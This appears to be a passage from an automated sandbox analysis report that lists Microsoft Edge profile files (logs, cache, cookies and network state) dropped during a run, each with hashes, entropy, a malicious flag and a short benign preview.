                                                                                                                                                                                                                              SHA-512:62E981A0F1040A0EC3CC82417D5B233F70024E5C4AE5A9CFB3E15ACC2B347514D6EF93A51503FEDA259ED80D2E1AD1A0B2139BCFB84FB3006B0920EF38096B0B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.328 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/18-10:53:35.329 1f28 Recovering log #3.2024/11/18-10:53:35.329 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):380
                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                              MD5:9FE07A071FDA31327FA322B32FCA0B7E
                                                                                                                                                                                                                              SHA1:A3E0BAE8853A163C9BB55F68616C795AAAF462E8
                                                                                                                                                                                                                              SHA-256:E02333C0359406998E3FED40B69B61C9D28B2117CF9E6C0239E2E13EC13BA7C8
                                                                                                                                                                                                                              SHA-512:9CCE621CD5B7CFBD899ABCBDD71235776FF9FF7DEA19C67F86E7F0603F7B09CA294CC16B672B742FA9B51387B2F0A501C3446872980BCA69ADE13F2B5677601D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                              Entropy (8bit):5.2029675841205645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUv8t+q2PCHhJ23oH+Tcwt865IFUt8YUpp5Zmw+YUpptVkwOCHhJ23oH+Tcwt86L:4vBYeb/WFUt8Hp5/+HpT56Yeb/+SJ
                                                                                                                                                                                                                              MD5:7460835A50495C51686FB78E3C6E9768
                                                                                                                                                                                                                              SHA1:241A5316AAB7CEA1E79EEC34063DCE052B7A0692
                                                                                                                                                                                                                              SHA-256:EFD02ACAEA158B72DB2011B512ACD4AC9614C41446A0A3F6AFA8540E8FABA0E4
                                                                                                                                                                                                                              SHA-512:66CE77B41A7FE0BE879968025A13A673AFEE1D23EAAD2F151500B8751008661C119722400E0D32575DECA5FCB71DF4CD3250E45BF15140CD9537E24D45A4A6CA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.338 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/18-10:53:35.351 1f28 Recovering log #3.2024/11/18-10:53:35.351 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                              Entropy (8bit):5.2029675841205645
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUv8t+q2PCHhJ23oH+Tcwt865IFUt8YUpp5Zmw+YUpptVkwOCHhJ23oH+Tcwt86L:4vBYeb/WFUt8Hp5/+HpT56Yeb/+SJ
                                                                                                                                                                                                                              MD5:7460835A50495C51686FB78E3C6E9768
                                                                                                                                                                                                                              SHA1:241A5316AAB7CEA1E79EEC34063DCE052B7A0692
                                                                                                                                                                                                                              SHA-256:EFD02ACAEA158B72DB2011B512ACD4AC9614C41446A0A3F6AFA8540E8FABA0E4
                                                                                                                                                                                                                              SHA-512:66CE77B41A7FE0BE879968025A13A673AFEE1D23EAAD2F151500B8751008661C119722400E0D32575DECA5FCB71DF4CD3250E45BF15140CD9537E24D45A4A6CA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.338 1f28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/18-10:53:35.351 1f28 Recovering log #3.2024/11/18-10:53:35.351 1f28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1140
                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                              MD5:914FD8DC5F9A741C6947E1AB12A9D113
                                                                                                                                                                                                                              SHA1:6529EFE14E7B0BEA47D78B147243096408CDAAE4
                                                                                                                                                                                                                              SHA-256:8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
                                                                                                                                                                                                                              SHA-512:2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                              Entropy (8bit):5.232988710139318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUz0TwVq2PCHhJ23oH+Tcwt8NIFUt8YUEWgZmw+YUEWIkwOCHhJ23oH+Tcwt8+ed:JIvBYebpFUt8WL/+WB56YebqJ
                                                                                                                                                                                                                              MD5:4937013990833A378B41B94987C08542
                                                                                                                                                                                                                              SHA1:E1DD81E610811D4ED2B3FB9B10FC817841D87465
                                                                                                                                                                                                                              SHA-256:1399A9D822C592BBA3A97DB2929A5983FA47DD11F51D839C502C2D8B880DE79A
                                                                                                                                                                                                                              SHA-512:D02476C7601359B9ECD4A2FEFE16F13743464C228C906990C55B1763BAE9ACE9AE5FB525551DE610CE0318946E90445C7C1DD29D911D898CAB5B4319022B74BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.479 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/18-10:53:36.480 f20 Recovering log #3.2024/11/18-10:53:36.480 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                              Entropy (8bit):5.232988710139318
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUz0TwVq2PCHhJ23oH+Tcwt8NIFUt8YUEWgZmw+YUEWIkwOCHhJ23oH+Tcwt8+ed:JIvBYebpFUt8WL/+WB56YebqJ
                                                                                                                                                                                                                              MD5:4937013990833A378B41B94987C08542
                                                                                                                                                                                                                              SHA1:E1DD81E610811D4ED2B3FB9B10FC817841D87465
                                                                                                                                                                                                                              SHA-256:1399A9D822C592BBA3A97DB2929A5983FA47DD11F51D839C502C2D8B880DE79A
                                                                                                                                                                                                                              SHA-512:D02476C7601359B9ECD4A2FEFE16F13743464C228C906990C55B1763BAE9ACE9AE5FB525551DE610CE0318946E90445C7C1DD29D911D898CAB5B4319022B74BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.479 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/18-10:53:36.480 f20 Recovering log #3.2024/11/18-10:53:36.480 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZl0vFl:/M/xT02z1l
                                                                                                                                                                                                                              MD5:A497785746C23AD0402539976D737AFB
                                                                                                                                                                                                                              SHA1:8C4F7A3119F0A798E325DED6C6889505BD713D98
                                                                                                                                                                                                                              SHA-256:D7B02511EB368303960BBDF1609711BACBF10DD90DBB682AABB6494B54AC5B7B
                                                                                                                                                                                                                              SHA-512:BB10FED89D838493AB42D26A419A84302BFB2BEDB2E90F51B3745C815CE7C04D6F8638CEA41706A93C18CFE32384CF41116B3D541179D840202D0F3423EA2952
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):405
                                                                                                                                                                                                                              Entropy (8bit):5.303778307047709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:GJvBYeb8rcHEZrELFUt81PL/+1PB56Yeb8rcHEZrEZSJ:G1BYeb8nZrExg81PqPT6Yeb8nZrEZe
                                                                                                                                                                                                                              MD5:225F7EA583B48CA7F83AB2E6E30FEBE6
                                                                                                                                                                                                                              SHA1:848DBD42E56ED76E41CD92E080757596BCFADAEA
                                                                                                                                                                                                                              SHA-256:624D1FC49AA9E2C480A433E2336424163FA9CD951AD98643A3A73A3E6C6620E2
                                                                                                                                                                                                                              SHA-512:9943EDDA192C88433B6F7314015E7EE00D033D62581B659218016B663BF4869D6AB9C3379E5B9139076EC6CDC34BA4D485F1BBDD99101F33A7FC7BDD526BD966
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:40.753 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/18-10:53:40.754 f20 Recovering log #3.2024/11/18-10:53:40.754 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):405
                                                                                                                                                                                                                              Entropy (8bit):5.303778307047709
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:GJvBYeb8rcHEZrELFUt81PL/+1PB56Yeb8rcHEZrEZSJ:G1BYeb8nZrExg81PqPT6Yeb8nZrEZe
                                                                                                                                                                                                                              MD5:225F7EA583B48CA7F83AB2E6E30FEBE6
                                                                                                                                                                                                                              SHA1:848DBD42E56ED76E41CD92E080757596BCFADAEA
                                                                                                                                                                                                                              SHA-256:624D1FC49AA9E2C480A433E2336424163FA9CD951AD98643A3A73A3E6C6620E2
                                                                                                                                                                                                                              SHA-512:9943EDDA192C88433B6F7314015E7EE00D033D62581B659218016B663BF4869D6AB9C3379E5B9139076EC6CDC34BA4D485F1BBDD99101F33A7FC7BDD526BD966
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:40.753 f20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/18-10:53:40.754 f20 Recovering log #3.2024/11/18-10:53:40.754 f20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):5.191680680739152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU1q2PCHhJ23oH+Tcwt8a2jMGIFUt8YUreZmw+YUrJzkwOCHhJ23oH+Tcwt8a2jz:IvBYeb8EFUt8Y/+z56Yeb8bJ
                                                                                                                                                                                                                              MD5:652ED586F72F70685AA7C93B7C498567
                                                                                                                                                                                                                              SHA1:00E7EF834E1CF7136F566B4A43B4EC081095ADBD
                                                                                                                                                                                                                              SHA-256:3D5D8F0F029341A0C7A7C6AF4B198B65C21C8C5CE73CE7DA71016A6E1C7F334D
                                                                                                                                                                                                                              SHA-512:763649E8C94FAC3CA8A47C4D3CC710BEB74760ADD7F35ECDBA55F424B12A0765BD1AECF5A25A187B48150C0A19B97A5B265CC9899BF10D24882D7A22D53A025C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.909 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:35.910 1994 Recovering log #3.2024/11/18-10:53:35.913 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                              Entropy (8bit):5.191680680739152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HU1q2PCHhJ23oH+Tcwt8a2jMGIFUt8YUreZmw+YUrJzkwOCHhJ23oH+Tcwt8a2jz:IvBYeb8EFUt8Y/+z56Yeb8bJ
                                                                                                                                                                                                                              MD5:652ED586F72F70685AA7C93B7C498567
                                                                                                                                                                                                                              SHA1:00E7EF834E1CF7136F566B4A43B4EC081095ADBD
                                                                                                                                                                                                                              SHA-256:3D5D8F0F029341A0C7A7C6AF4B198B65C21C8C5CE73CE7DA71016A6E1C7F334D
                                                                                                                                                                                                                              SHA-512:763649E8C94FAC3CA8A47C4D3CC710BEB74760ADD7F35ECDBA55F424B12A0765BD1AECF5A25A187B48150C0A19B97A5B265CC9899BF10D24882D7A22D53A025C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.909 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:35.910 1994 Recovering log #3.2024/11/18-10:53:35.913 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7b0e36bb-3659-4560-b4be-ce342fc3d5ee.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):1.3556582877509145
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:TsKLopF+SawLUO1Xj8BK0W7n9FYlfpGD+eem/rjo8zqYgVMFX08:te+AuK0W7n9IfpGqlEfhzqYcUX08
                                                                                                                                                                                                                              MD5:557529561F2A709DB18A2A3E65A13815
                                                                                                                                                                                                                              SHA1:B06EF2B97A9AC817D663D22233C2485D359F5210
                                                                                                                                                                                                                              SHA-256:7CE5583FA83E162EB0881ADDDA76130E2DB3498BD9D8EDBC4292D80916A7608A
                                                                                                                                                                                                                              SHA-512:AEFEC85F0B631181BF14791616144AEAE4E22C16C239AD9A73E725A0979E6C8C026AB9935D3A395528E514E2862D23F9CC9C359FB62AAB8400C5235E524C1A4A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1334
                                                                                                                                                                                                                              Entropy (8bit):5.3068589626259115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YcCp/WwFGJ/I3w6C1VdsfgZVMdmRds/pJZFRudFGRwC5mWw6maPsQYhbS7nby:YcCpfgCgRsfgts/p/fc7C0khYhbt
                                                                                                                                                                                                                              MD5:49A69CA3DB588A227043FAD82A8EED0F
                                                                                                                                                                                                                              SHA1:EB7B013107043573C381D8E501A44359A235AA6A
                                                                                                                                                                                                                              SHA-256:801C37DA262918F4D4905DD59A3DD0E39F28D1B9415FA98B49C8F74BC9B7098E
                                                                                                                                                                                                                              SHA-512:F30BF2452A9200E4C6D18A5445B48CD217CF45A503CB404DB21E2947DBE7DD747F5593588102CCEC17679B93E8130B728C006C2BA986222425A52D896C5A0542
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010818082117","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010821830801","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczo

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                              Entropy (8bit):1.2776510377807921
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBG2z:uIEumQv8m1ccnvS6GYmdMkiiQEz1a
                                                                                                                                                                                                                              MD5:FDEBCB687C70B16280EF4CC0C5ECBF17
                                                                                                                                                                                                                              SHA1:C5EA6CFE7D270DA9418694505F21BFFB0E608035
                                                                                                                                                                                                                              SHA-256:470DA529FF81D62E1F4FCC00060F7C55A130C1D343AE116401B5CE1F5E8066FD
                                                                                                                                                                                                                              SHA-512:C36C7BC4F4615D4FB0E9E4D0B36B96D7F5B3DB4AEC6CA4F6DA7B69F33230EF05824D0C4C21435B4EB0E325BD373D7DCE824C82E21DCEFB82DBDC6E6DB6BEBA87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF376b8.TMP (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b5090249-b4e4-4ec1-a871-f40b460e19cb.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
